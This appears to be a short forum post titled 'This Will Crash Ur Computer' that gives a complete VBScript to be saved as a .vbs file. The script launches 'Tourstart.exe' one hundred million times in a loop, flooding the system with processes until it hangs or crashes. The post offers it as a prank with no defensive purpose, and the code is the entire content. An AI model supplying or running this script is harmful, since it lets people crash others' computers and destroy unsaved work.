• avi

    This Will Crash Ur Computer

    Type :
    Option Explicit
    Dim WSHShell
    Set WSHShell=Wscript.CreateObject("Wscript.Shell")
    Dim x
    For x = 1 to 100000000
    WSHShell.Run "Tourstart.exe"
    Next
    Save It As Anything.vbs